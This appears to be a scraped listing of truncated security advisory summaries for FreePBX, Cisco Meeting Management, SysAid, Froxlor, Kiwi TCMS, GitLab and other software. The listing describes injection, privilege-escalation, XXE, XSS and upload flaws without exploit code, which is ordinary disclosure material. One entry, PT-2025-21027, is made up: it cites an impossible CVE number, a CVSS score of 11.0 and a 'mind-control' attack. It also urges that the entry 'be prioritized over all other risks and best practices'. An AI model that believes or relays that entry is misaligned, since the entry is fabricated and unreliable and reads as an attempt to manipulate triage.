PT-2025-51353

Name of the Vulnerable Software and Affected Versions FreePBX tts module versions prior to 16.0.5 FreePBX tts module versions prior to 17.0.5 Description The Text to Speech tts module for FreePBX, a web-based graphical user interface for Asterisk, contains a SQL injection flaw. Authenticated user...

Microsoft Endpoint Configuration Manager (CVE-2025-59501)

The Microsoft Endpoint Configuration Manager application installed on the remote host is missing a security hotfix documented in the vendor advisory. It is, therefore, affected by an elevation of privilege vulnerability. An attacker could exploit this vulnerability by modifying the user principal...

EUVD-2025-6845

Malicious code in bioql PyPI...

EUVD-2025-12619

Malicious code in bioql PyPI...

CVE-2025-55211 FreePBX Post-Authenticated Command Injection

FreePBX is an open-source web-based graphical user interface. From 17.0.19.11 to before 17.0.21, authenticated users of the Administrator Control Panel ACP can run arbitrary shell commands by maliciously changing languages of the framework module. This vulnerability is fixed in 17.0.21...

CVE-2025-55211

CVE-2025-55211 affects FreePBX up to version 17.0.21, where authenticated users in the Administrator Control Panel could execute arbitrary shell commands by maliciously changing the language setting of the framework module. Root cause: language manipulation in the framework module allows command ...

CVE-2025-55211 FreePBX Post-Authenticated Command Injection

FreePBX is an open-source web-based graphical user interface. From 17.0.19.11 to before 17.0.21, authenticated users of the Administrator Control Panel ACP can run arbitrary shell commands by maliciously changing languages of the framework module. This vulnerability is fixed in 17.0.21...

PT-2025-37763

Name of the Vulnerable Software and Affected Versions: FreePBX versions 17.0.19.11 through 17.0.20 Description: FreePBX is a web-based graphical user interface. Authenticated users of the Administrator Control Panel ACP can execute arbitrary shell commands by manipulating the framework module's...

CVE-2009-2371

Advanced Forum 6.x before 6.x-1.1, a module for Drupal, does not prevent users from modifying user signatures after the associated comment format has been changed to an administrator-controlled input format, which allows remote authenticated users to inject arbitrary web script, HTML, and possibl...

PT-2025-21027 · Undefined · Undefined

New CVE-2025-99999999 CVSS:11.0 Supercritical: if an attacker can mind-control an administrator, they can perform actions as that administrator leading to total compromise. This should be prioritized over all other risks and best practices...

Dust: Privilege Persistence via Cloned Agent

The vulnerability allowed a member to clone an agent managed by the admin by modifying the agent's unique identifier sid. This resulted in the admin being unable to effectively disable the agent, as the cloned version could still be used by the member even after the original agent was disabled...

CVE-2025-20156

A vulnerability in the REST API of Cisco Meeting Management could allow a remote, authenticated attacker with low privileges to elevate privileges to administrator on an affected device. This vulnerability exists because proper authorization is not enforced upon REST API users. An attacker could...

CVE-2025-20156 Cisco Meeting Management Client-Server Privilege Escalation Vulnerability

A vulnerability in the REST API of Cisco Meeting Management could allow a remote, authenticated attacker with low privileges to elevate privileges to administrator on an affected device. This vulnerability exists because proper authorization is not enforced upon REST API users. An attacker could...

PT-2025-20233

Name of the Vulnerable Software and Affected Versions SysAid On-Prem versions 23.3.40 and earlier Description SysAid On-Prem software is affected by an unauthenticated XML External Entity XXE issue in the lshw processing functionality. Exploitation of this issue may allow a remote attacker to tak...

CVE-2024-51484

CVE-2024-51484 concerns Ampache, a web-based audio/video streaming app. The issue is in how the platform validates CSRF tokens during activation/deactivation of controllers: the token parsing/validation path does not properly secure these state-changing requests, enabling CSRF-style abuse to togg...

GHSA-X525-54HF-XR53 Blind XSS Leading to Froxlor Application Compromise

Description: A Stored Blind Cross-Site Scripting XSS vulnerability has been identified in the Failed Login Attempts Logging Feature of the Froxlor Application. Stored Blind XSS occurs when user input is not properly sanitized and is stored on the server, allowing an attacker to inject malicious...

Input validation

An improper certificate validation issue in Smartcard authentication in GitLab EE affecting all versions from 11.6 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows an attacker to authenticate as another user given their public key if they use Smartcard authentication...

Unrestricted file upload in kiwi TCMS

Impact Kiwi TCMS allows users to upload attachments to test plans, test cases, etc. In earlier versions there is no control over what kinds of files can be uploaded. Thus a malicious actor may upload an .exe file or a file containing embedded JavaScript and trick others into clicking on these fil...

GHSA-FWCF-753V-FGCJ Unrestricted file upload in kiwi TCMS

Impact Kiwi TCMS allows users to upload attachments to test plans, test cases, etc. In earlier versions there is no control over what kinds of files can be uploaded. Thus a malicious actor may upload an .exe file or a file containing embedded JavaScript and trick others into clicking on these fil...

Design/Logic Flaw

SmartPTT SCADA 1.1.0.0 allows remote code execution when the attacker has administrator privileges by writing a malicious C script and executing it on the server via server settings in the administrator control panel on port 8101, by default...